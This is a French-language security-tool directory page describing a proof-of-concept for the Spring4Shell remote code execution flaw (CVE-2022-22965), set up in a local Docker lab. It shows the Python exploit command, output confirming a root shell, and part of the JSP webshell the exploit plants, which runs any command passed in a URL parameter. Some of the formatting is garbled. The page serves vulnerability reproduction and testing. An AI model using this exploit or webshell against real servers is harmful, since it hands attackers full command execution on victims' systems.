Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Spring4Shell-POC — Reproduit la vulnérabilité d'exécution de code à distance Spring4Shell (CVE-2022-22965) avec un script d'exploitation Python, déployant un webshell JSP sur Apache Tomcat pour les tests et la vérification. | Kitploit
Outils/GitHubGitHub/weijilab/spring4shell-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubweijilab/spring4shell-poc

Spring4Shell-POC

Reproduit la vulnérabilité d'exécution de code à distance Spring4Shell (CVE-2022-22965) avec un script d'exploitation Python, déployant un webshell JSP sur Apache Tomcat pour les tests et la vérification.

Voir le dépôt
113107il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spring4Shell-POC

Processus de reproduction locale de la vulnérabilité Spring4Shell

Préparation de l'environnement

  • Environnement : docker, docker-compose

  • Paquetage avec mvn, génération de ``./target/ROOT.war`````shell mvn package

* Démarrer le service```shell
docker-compose up -d
  • Arrêter le service```shell docker-compose down
## Processus de reproduction

* Exécutez le script```shell
python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
  • Première exécution

Première exécution

  • Deuxième exécution

Deuxième exécution

  • Processus d'exécution``` ➜ spring4shell-poc clear
    ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: ➜ spring4shell-poc clear ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: root

//

  • if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

➜ spring4shell-poc

* Dans le conteneur Docker, on peut voir qu'un fichier JSP a été créé dans le service d'application Tomcat.

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/3c171f1bcbfd46534f345a9aee6089e18ced9569afd208bd7eb33cc882246688.png)


* Le web peut également y accéder directement.

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/5205a0cd1c694bfa02964a130c6a05ded1c1d1f3a2ce4d96b85d74ed863b85fd.png)


## Points d'attention
Télécharger l’outil